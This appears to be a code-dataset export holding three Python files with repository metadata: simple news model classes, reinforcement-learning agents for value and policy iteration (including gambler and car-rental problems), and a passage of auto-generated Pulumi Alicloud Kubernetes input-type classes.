96bdc97dfaa2e32bf6e50c9a66aee7b20e94bf0f
| 830
|
py
|
Python
|
app/models.py
|
OwinoLucas/news
|
2ac3f0cedefbf005f1ef557063826869947bd1c1
|
[
"Unlicense"
] | null | null | null |
app/models.py
|
OwinoLucas/news
|
2ac3f0cedefbf005f1ef557063826869947bd1c1
|
[
"Unlicense"
] | null | null | null |
app/models.py
|
OwinoLucas/news
|
2ac3f0cedefbf005f1ef557063826869947bd1c1
|
[
"Unlicense"
] | null | null | null |
class News_source:
"""
News_source class to define news_source objects
"""
def __init__(self,id,name,title,description,url,urlToImage,publishedAt,content):
self.id = id
self.name = name
self.title = title
self.description = description
self.url = url
self.urlToImage = urlToImage
self.publishedAt = publishedAt
self.content = content
class Articles:
"""
Articles class to define articles objects
"""
def __init__(self,id,name,title,description,url,urlToImage,publishedAt,content):
self.id = id
self.name = name
self.title = title
self.description = description
self.url = url
self.urlToImage = urlToImage
self.publishedAt = publishedAt
self.content = content
| 27.666667
| 84
| 0.625301
| 89
| 830
| 5.707865
| 0.202247
| 0.047244
| 0.051181
| 0.070866
| 0.822835
| 0.822835
| 0.822835
| 0.822835
| 0.822835
| 0.822835
| 0
| 0
| 0.292771
| 830
| 30
| 85
| 27.666667
| 0.865417
| 0.107229
| 0
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7373061ad55c7e34dbdf029e1672f2791aab7883
| 10,183
|
py
|
Python
|
agent.py
|
batra98/MDP-Basics
|
062ad165313d37d1c88ab5b3407dac11a3ef2b47
|
[
"MIT"
] | null | null | null |
agent.py
|
batra98/MDP-Basics
|
062ad165313d37d1c88ab5b3407dac11a3ef2b47
|
[
"MIT"
] | null | null | null |
agent.py
|
batra98/MDP-Basics
|
062ad165313d37d1c88ab5b3407dac11a3ef2b47
|
[
"MIT"
] | 1
|
2022-03-14T16:08:33.000Z
|
2022-03-14T16:08:33.000Z
|
from abc import ABC, abstractmethod
import numpy as np
class DiscreteAgent(ABC):
def __init__(self,env):
self.nstates = env.nstates
self.nactions = env.nactions
self.V = np.zeros(env.nstates)
self.V2 = np.zeros(env.nstates)
self.policy = np.zeros([env.nstates,env.nactions])
self.delta = 0
self.gamma = 1
self.P = env.P
self.threshold = 0.00001
@abstractmethod
def update(self):
pass
def get_action(self,state):
A = np.zeros(self.nactions)
for a in range(self.nactions):
for prob,next_state,reward,terminate in self.P[state][a]:
A[a] += prob*(reward+self.gamma*self.V[next_state])
return A
@abstractmethod
def reset(self):
pass
@abstractmethod
def get_policy(self):
pass
def set_gamma(self,gamma):
self.gamma = gamma
def set_threshold(self,threshold):
self.threshold = threshold
def get_threshold(self):
return self.threshold
def get_delta(self):
return self.delta
def clear(self):
self.V = np.zeros(self.nstates)
self.V2 = np.zeros(self.nstates)
self.policy = np.zeros([self.nstates,self.nactions])
class PolicyIteration(DiscreteAgent):
def __init__(self,env):
super().__init__(env)
self.policy = np.ones([self.nstates, self.nactions]) / self.nactions
def evaluate_policy(self):
self.V2 = np.zeros(self.nstates)
self.V = np.zeros(self.nstates)
while True:
self.delta = 0
self.V = np.copy(self.V2)
for s in range(self.nstates):
v = 0
for a, action_prob in enumerate(self.policy[s]):
for prob, next_state, reward, done in self.P[s][a]:
v += action_prob * prob * (reward + self.gamma * self.V[next_state])
self.delta = max(self.delta, np.abs(v - self.V[s]))
self.V2[s] = v
if self.delta < self.threshold:
break
return np.array(self.V)
def update(self):
policy_stable = True
for s in range(self.nstates):
chosen_a = np.argmax(self.policy[s])
action_values = self.get_action(s)
best_a = np.argmax(action_values)
if chosen_a != best_a:
policy_stable = False
self.policy[s] = np.eye(self.nactions)[best_a]
return policy_stable
def get_policy(self):
return self.policy
def reset(self):
pass
def clear(self):
super().clear()
self.policy = np.ones([self.nstates, self.nactions]) / self.nactions
class ValueIteration(DiscreteAgent):
# def get_action(self,state):
# A = np.zeros(self.nactions)
# for a in range(self.nactions):
# for prob,next_state,reward,terminate in self.P[state][a]:
# A[a] += prob*(reward+self.gamma*self.V[next_state])
# return A
def update(self):
self.V = np.copy(self.V2)
for s in range(self.nstates):
A = self.get_action(s)
best_action_value = np.max(A)
self.delta = max(self.delta,np.abs(best_action_value-self.V[s]))
self.V2[s] = best_action_value
def reset(self):
self.delta = 0
def get_policy(self):
self.policy = np.zeros([self.nstates,self.nactions])
for s in range(self.nstates):
A = self.get_action(s)
# print(A)
best_action = np.argmax(A)
self.policy[s,best_action] = 1.0
return self.policy
class ConfusedAgent(DiscreteAgent):
def get_policy(self):
self.policy = np.zeros([self.nstates,self.nactions])
for s in range(self.nstates):
A = self.get_action(s)
temp = np.random.randint(low = 0,high = 4)
self.policy[s,temp] = 1.0
self.V[s] = A[temp]
return self.policy
def reset(self):
pass
def update(self):
pass
class Gambler_ValueIteration(DiscreteAgent):
def __init__(self,env):
super().__init__(env)
self.p_h = env.p_h
self.rewards = env.rewards
def get_action(self,state):
A = np.zeros(self.nstates)
possible_bet = range(1,min(state,100-state)+1)
# print(self.p_h)
for a in possible_bet:
A[a] = self.p_h * (self.rewards[state+a]+self.V[state+a]*self.gamma) + (1-self.p_h)*(self.rewards[state-a]+self.V[state-a]*self.gamma)
# print(self.rewards)
return A
def update(self):
y = []
self.V = np.copy(self.V2)
for s in range(1,self.nstates-1):
A = self.get_action(s)
best_action_value = np.max(A)
self.delta = max(self.delta,np.abs(best_action_value-self.V[s]))
self.V2[s] = best_action_value
y.append(self.V)
return y
def reset(self):
self.delta = 0
def get_policy(self):
self.policy = np.zeros(self.nstates-1)
for s in range(self.nstates-1):
A = self.get_action(s)
best_action = np.argmax(A)
self.policy[s] = best_action
return self.policy
def clear(self):
super().clear()
self.policy = np.zeros(self.nstates-1)
class Jack_PolicyIteration():
def __init__(self,env):
self.limit = 8
self.max_cars = env.max_cars
self.V = np.zeros((self.max_cars+1,self.max_cars+1))
self.V_2 = np.zeros((self.max_cars+1,self.max_cars+1))
self.policy = np.zeros(self.V.shape,dtype = np.int)
self.delta = 0
self.profit = env.profit
self.loss = env.loss
self.gamma = 0.9
self.store_return_1 = env.store_return_1
self.store_return_2 = env.store_return_2
self.store_rent_1 = env.store_rent_1
self.store_rent_2 = env.store_rent_2
self.threshold = 0.001
self.actions = env.actions
def get_next_value(self,state,action):
value = 0.0
value -= self.loss*abs(action)
cars_at_1 = min(state[0]-action,self.max_cars)
cars_at_2 = min(state[1]+action,self.max_cars)
for rent_1 in range(self.limit):
for rent_2 in range(self.limit):
prob_rent = self.store_rent_1[rent_1]*self.store_rent_2[rent_2]
present_number_at_1 = cars_at_1
present_number_at_2 = cars_at_2
request_at_1 = min(present_number_at_1,rent_1)
request_at_2 = min(present_number_at_2,rent_2)
reward = (request_at_1+request_at_2)*(self.profit)
present_number_at_1 -= request_at_1
present_number_at_2 -= request_at_2
# print(present_number_at_1)
for return_1 in range(self.limit):
for return_2 in range(self.limit):
prob_return = self.store_return_1[return_1]*self.store_return_2[return_2]
present_number_at_1_1 = min(present_number_at_1+return_1,self.max_cars)
present_number_at_2_1 = min(present_number_at_2+return_2,self.max_cars)
# print(present_number_at_1)
value += (prob_return*prob_rent)*(reward+(self.gamma)*self.V[present_number_at_1_1][present_number_at_2_1])
return value
def evaluate_policy(self):
while True:
self.delta = 0
self.V_2 = self.V.copy()
for i in range(self.max_cars+1):
for j in range(self.max_cars+1):
next_state_value = self.get_next_value([i,j],self.policy[i][j])
self.V[i][j] = next_state_value
self.delta = abs(self.V_2 - self.V).max()
# print(self.delta)
if self.delta < self.threshold:
break
# print(self.V)
def update(self):
policy_stable = True
for i in range(self.max_cars+1):
for j in range(self.max_cars+1):
chosen_a = self.policy[i][j]
A = []
for action in self.actions:
if (0 <= action <= i) or (-j <= action <= 0):
A.append(self.get_next_value([i,j],action))
else:
A.append(-np.inf)
new_action = self.actions[np.argmax(A)]
self.policy[i][j] = new_action
if policy_stable and chosen_a!=new_action:
policy_stable = False
# print(self.policy)
return policy_stable
class Jack_PolicyIteration_2():
def __init__(self,env):
self.limit = 8
self.max_cars = env.max_cars
self.V = np.zeros((self.max_cars+1,self.max_cars+1))
self.V_2 = np.zeros((self.max_cars+1,self.max_cars+1))
self.policy = np.zeros(self.V.shape,dtype = np.int)
self.delta = 0
self.profit = env.profit
self.loss = env.loss
self.gamma = 0.9
self.store_return_1 = env.store_return_1
self.store_return_2 = env.store_return_2
self.store_rent_1 = env.store_rent_1
self.store_rent_2 = env.store_rent_2
self.threshold = 0.001
self.actions = env.actions
self.cost = 4
def get_next_value(self,state,action):
value = 0.0
if action > 0:
temp = action-1
else:
temp = action
value -= self.loss*abs(temp)
cars_at_1 = min(state[0]-action,self.max_cars)
cars_at_2 = min(state[1]+action,self.max_cars)
for rent_1 in range(self.limit):
for rent_2 in range(self.limit):
prob_rent = self.store_rent_1[rent_1]*self.store_rent_2[rent_2]
present_number_at_1 = cars_at_1
present_number_at_2 = cars_at_2
request_at_1 = min(present_number_at_1,rent_1)
request_at_2 = min(present_number_at_2,rent_2)
reward = (request_at_1+request_at_2)*(self.profit)
present_number_at_1 -= request_at_1
present_number_at_2 -= request_at_2
# print(present_number_at_1)
for return_1 in range(self.limit):
for return_2 in range(self.limit):
prob_return = self.store_return_1[return_1]*self.store_return_2[return_2]
present_number_at_1_1 = min(present_number_at_1+return_1,self.max_cars)
present_number_at_2_1 = min(present_number_at_2+return_2,self.max_cars)
# print(present_number_at_1)
if present_number_at_1_1 > 10:
reward -= self.cost
if present_number_at_2_1 > 10:
reward -= self.cost
value += (prob_return*prob_rent)*(reward+(self.gamma)*self.V[present_number_at_1_1][present_number_at_2_1])
return value
def evaluate_policy(self):
while True:
self.delta = 0
self.V_2 = self.V.copy()
for i in range(self.max_cars+1):
for j in range(self.max_cars+1):
next_state_value = self.get_next_value([i,j],self.policy[i][j])
self.V[i][j] = next_state_value
self.delta = abs(self.V_2 - self.V).max()
# print(self.delta)
if self.delta < self.threshold:
break
# print(self.V)
def update(self):
policy_stable = True
for i in range(self.max_cars+1):
for j in range(self.max_cars+1):
chosen_a = self.policy[i][j]
A = []
for action in self.actions:
if (0 <= action <= i) or (-j <= action <= 0):
A.append(self.get_next_value([i,j],action))
else:
A.append(-np.inf)
new_action = self.actions[np.argmax(A)]
self.policy[i][j] = new_action
if policy_stable and chosen_a!=new_action:
policy_stable = False
# print(self.policy)
return policy_stable
| 23.463134
| 137
| 0.677993
| 1,716
| 10,183
| 3.798368
| 0.065268
| 0.028383
| 0.06904
| 0.041731
| 0.82019
| 0.784903
| 0.767413
| 0.74977
| 0.719699
| 0.696379
| 0
| 0.024982
| 0.190219
| 10,183
| 433
| 138
| 23.517321
| 0.765462
| 0.045959
| 0
| 0.768683
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.128114
| false
| 0.021352
| 0.007117
| 0.010676
| 0.213523
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73b0e2c8654248b765d025e21be5e1823debfc40
| 88,910
|
py
|
Python
|
sdk/python/pulumi_alicloud/cs/_inputs.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 42
|
2019-03-18T06:34:37.000Z
|
2022-03-24T07:08:57.000Z
|
sdk/python/pulumi_alicloud/cs/_inputs.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 152
|
2019-04-15T21:03:44.000Z
|
2022-03-29T18:00:57.000Z
|
sdk/python/pulumi_alicloud/cs/_inputs.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2020-08-26T17:30:07.000Z
|
2021-07-05T01:37:45.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'ApplicationServiceArgs',
'ClusterNodeArgs',
'EdgeKubernetesAddonArgs',
'EdgeKubernetesCertificateAuthorityArgs',
'EdgeKubernetesConnectionsArgs',
'EdgeKubernetesLogConfigArgs',
'EdgeKubernetesWorkerDataDiskArgs',
'EdgeKubernetesWorkerNodeArgs',
'KubernetesAddonArgs',
'KubernetesAutoscalerNodepoolArgs',
'KubernetesCertificateAuthorityArgs',
'KubernetesConnectionsArgs',
'KubernetesMasterNodeArgs',
'KubernetesPermissionPermissionArgs',
'KubernetesRuntimeArgs',
'KubernetesTaintArgs',
'KubernetesWorkerDataDiskArgs',
'KubernetesWorkerNodeArgs',
'ManagedKubernetesAddonArgs',
'ManagedKubernetesCertificateAuthorityArgs',
'ManagedKubernetesConnectionsArgs',
'ManagedKubernetesMaintenanceWindowArgs',
'ManagedKubernetesRuntimeArgs',
'ManagedKubernetesTaintArgs',
'ManagedKubernetesWorkerDataDiskArgs',
'ManagedKubernetesWorkerNodeArgs',
'NodePoolDataDiskArgs',
'NodePoolLabelArgs',
'NodePoolManagementArgs',
'NodePoolScalingConfigArgs',
'NodePoolSpotPriceLimitArgs',
'NodePoolTaintArgs',
'ServerlessKubernetesAddonArgs',
'SwarmNodeArgs',
'GetKubernetesPermissionPermissionArgs',
]
@pulumi.input_type
class ApplicationServiceArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
version: Optional[pulumi.Input[str]] = None):
if id is not None:
pulumi.set(__self__, "id", id)
if name is not None:
pulumi.set(__self__, "name", name)
if status is not None:
pulumi.set(__self__, "status", status)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version", value)
@pulumi.input_type
class ClusterNodeArgs:
def __init__(__self__, *,
eip: Optional[pulumi.Input[str]] = None,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
private_ip: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None):
if eip is not None:
pulumi.set(__self__, "eip", eip)
if id is not None:
pulumi.set(__self__, "id", id)
if name is not None:
pulumi.set(__self__, "name", name)
if private_ip is not None:
pulumi.set(__self__, "private_ip", private_ip)
if status is not None:
pulumi.set(__self__, "status", status)
@property
@pulumi.getter
def eip(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "eip")
@eip.setter
def eip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "eip", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="privateIp")
def private_ip(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "private_ip")
@private_ip.setter
def private_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ip", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@pulumi.input_type
class EdgeKubernetesAddonArgs:
def __init__(__self__, *,
config: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
"""
if config is not None:
pulumi.set(__self__, "config", config)
if disabled is not None:
pulumi.set(__self__, "disabled", disabled)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def config(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "config")
@config.setter
def config(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "config", value)
@property
@pulumi.getter
def disabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "disabled")
@disabled.setter
def disabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disabled", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The kubernetes cluster's name. It is unique in one Alicloud account.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class EdgeKubernetesCertificateAuthorityArgs:
def __init__(__self__, *,
client_cert: Optional[pulumi.Input[str]] = None,
client_key: Optional[pulumi.Input[str]] = None,
cluster_cert: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] client_cert: The path of client certificate, like `~/.kube/client-cert.pem`.
:param pulumi.Input[str] client_key: The path of client key, like `~/.kube/client-key.pem`.
:param pulumi.Input[str] cluster_cert: The base64 encoded cluster certificate data required to communicate with your cluster. Add this to the certificate-authority-data section of the kubeconfig file for your cluster.
"""
if client_cert is not None:
pulumi.set(__self__, "client_cert", client_cert)
if client_key is not None:
pulumi.set(__self__, "client_key", client_key)
if cluster_cert is not None:
pulumi.set(__self__, "cluster_cert", cluster_cert)
@property
@pulumi.getter(name="clientCert")
def client_cert(self) -> Optional[pulumi.Input[str]]:
"""
The path of client certificate, like `~/.kube/client-cert.pem`.
"""
return pulumi.get(self, "client_cert")
@client_cert.setter
def client_cert(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_cert", value)
@property
@pulumi.getter(name="clientKey")
def client_key(self) -> Optional[pulumi.Input[str]]:
"""
The path of client key, like `~/.kube/client-key.pem`.
"""
return pulumi.get(self, "client_key")
@client_key.setter
def client_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_key", value)
@property
@pulumi.getter(name="clusterCert")
def cluster_cert(self) -> Optional[pulumi.Input[str]]:
"""
The base64 encoded cluster certificate data required to communicate with your cluster. Add this to the certificate-authority-data section of the kubeconfig file for your cluster.
"""
return pulumi.get(self, "cluster_cert")
@cluster_cert.setter
def cluster_cert(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_cert", value)
@pulumi.input_type
class EdgeKubernetesConnectionsArgs:
def __init__(__self__, *,
api_server_internet: Optional[pulumi.Input[str]] = None,
api_server_intranet: Optional[pulumi.Input[str]] = None,
master_public_ip: Optional[pulumi.Input[str]] = None,
service_domain: Optional[pulumi.Input[str]] = None):
if api_server_internet is not None:
pulumi.set(__self__, "api_server_internet", api_server_internet)
if api_server_intranet is not None:
pulumi.set(__self__, "api_server_intranet", api_server_intranet)
if master_public_ip is not None:
pulumi.set(__self__, "master_public_ip", master_public_ip)
if service_domain is not None:
pulumi.set(__self__, "service_domain", service_domain)
@property
@pulumi.getter(name="apiServerInternet")
def api_server_internet(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "api_server_internet")
@api_server_internet.setter
def api_server_internet(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_server_internet", value)
@property
@pulumi.getter(name="apiServerIntranet")
def api_server_intranet(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "api_server_intranet")
@api_server_intranet.setter
def api_server_intranet(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_server_intranet", value)
@property
@pulumi.getter(name="masterPublicIp")
def master_public_ip(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "master_public_ip")
@master_public_ip.setter
def master_public_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "master_public_ip", value)
@property
@pulumi.getter(name="serviceDomain")
def service_domain(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "service_domain")
@service_domain.setter
def service_domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_domain", value)
@pulumi.input_type
class EdgeKubernetesLogConfigArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
project: Optional[pulumi.Input[str]] = None):
pulumi.set(__self__, "type", type)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@pulumi.input_type
class EdgeKubernetesWorkerDataDiskArgs:
def __init__(__self__, *,
auto_snapshot_policy_id: Optional[pulumi.Input[str]] = None,
category: Optional[pulumi.Input[str]] = None,
device: Optional[pulumi.Input[str]] = None,
encrypted: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
performance_level: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[str]] = None,
snapshot_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] auto_snapshot_policy_id: Worker node data disk auto snapshot policy.
:param pulumi.Input[str] category: The type of the data disks. Valid values: `cloud`, `cloud_efficiency`, `cloud_ssd` and `cloud_essd`. Default to `cloud_efficiency`.
:param pulumi.Input[str] encrypted: Specifies whether to encrypt data disks. Valid values: true and false. Default is `false`.
:param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
:param pulumi.Input[str] performance_level: Worker node data disk performance level, when `category` values `cloud_essd`, the optional values are `PL0`, `PL1`, `PL2` or `PL3`, but the specific performance level is related to the disk capacity. For more information, see [Enhanced SSDs](https://www.alibabacloud.com/help/doc-detail/122389.htm). Default is `PL1`.
:param pulumi.Input[str] size: The size of a data disk, at least 40. Unit: GiB.
"""
if auto_snapshot_policy_id is not None:
pulumi.set(__self__, "auto_snapshot_policy_id", auto_snapshot_policy_id)
if category is not None:
pulumi.set(__self__, "category", category)
if device is not None:
pulumi.set(__self__, "device", device)
if encrypted is not None:
pulumi.set(__self__, "encrypted", encrypted)
if kms_key_id is not None:
pulumi.set(__self__, "kms_key_id", kms_key_id)
if name is not None:
pulumi.set(__self__, "name", name)
if performance_level is not None:
pulumi.set(__self__, "performance_level", performance_level)
if size is not None:
pulumi.set(__self__, "size", size)
if snapshot_id is not None:
pulumi.set(__self__, "snapshot_id", snapshot_id)
@property
@pulumi.getter(name="autoSnapshotPolicyId")
def auto_snapshot_policy_id(self) -> Optional[pulumi.Input[str]]:
"""
Worker node data disk auto snapshot policy.
"""
return pulumi.get(self, "auto_snapshot_policy_id")
@auto_snapshot_policy_id.setter
def auto_snapshot_policy_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "auto_snapshot_policy_id", value)
@property
@pulumi.getter
def category(self) -> Optional[pulumi.Input[str]]:
"""
The type of the data disks. Valid values: `cloud`, `cloud_efficiency`, `cloud_ssd` and `cloud_essd`. Default to `cloud_efficiency`.
"""
return pulumi.get(self, "category")
@category.setter
def category(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "category", value)
@property
@pulumi.getter
def device(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "device")
@device.setter
def device(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "device", value)
@property
@pulumi.getter
def encrypted(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether to encrypt data disks. Valid values: true and false. Default is `false`.
"""
return pulumi.get(self, "encrypted")
@encrypted.setter
def encrypted(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "encrypted", value)
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "kms_key_id")
@kms_key_id.setter
def kms_key_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The kubernetes cluster's name. It is unique in one Alicloud account.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="performanceLevel")
def performance_level(self) -> Optional[pulumi.Input[str]]:
"""
Worker node data disk performance level, when `category` values `cloud_essd`, the optional values are `PL0`, `PL1`, `PL2` or `PL3`, but the specific performance level is related to the disk capacity. For more information, see [Enhanced SSDs](https://www.alibabacloud.com/help/doc-detail/122389.htm). Default is `PL1`.
"""
return pulumi.get(self, "performance_level")
@performance_level.setter
def performance_level(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "performance_level", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[str]]:
"""
The size of a data disk, at least 40. Unit: GiB.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter(name="snapshotId")
def snapshot_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "snapshot_id")
@snapshot_id.setter
def snapshot_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "snapshot_id", value)
@pulumi.input_type
class EdgeKubernetesWorkerNodeArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
private_ip: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] id: ID of the node.
:param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
:param pulumi.Input[str] private_ip: The private IP address of node.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if name is not None:
pulumi.set(__self__, "name", name)
if private_ip is not None:
pulumi.set(__self__, "private_ip", private_ip)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the node.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The kubernetes cluster's name. It is unique in one Alicloud account.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="privateIp")
def private_ip(self) -> Optional[pulumi.Input[str]]:
"""
The private IP address of node.
"""
return pulumi.get(self, "private_ip")
@private_ip.setter
def private_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ip", value)
@pulumi.input_type
class KubernetesAddonArgs:
def __init__(__self__, *,
config: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
"""
if config is not None:
pulumi.set(__self__, "config", config)
if disabled is not None:
pulumi.set(__self__, "disabled", disabled)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def config(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "config")
@config.setter
def config(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "config", value)
@property
@pulumi.getter
def disabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "disabled")
@disabled.setter
def disabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disabled", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The kubernetes cluster's name. It is unique in one Alicloud account.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class KubernetesAutoscalerNodepoolArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[str]] = None,
taints: Optional[pulumi.Input[str]] = None):
if id is not None:
pulumi.set(__self__, "id", id)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if taints is not None:
pulumi.set(__self__, "taints", taints)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter
def taints(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "taints")
@taints.setter
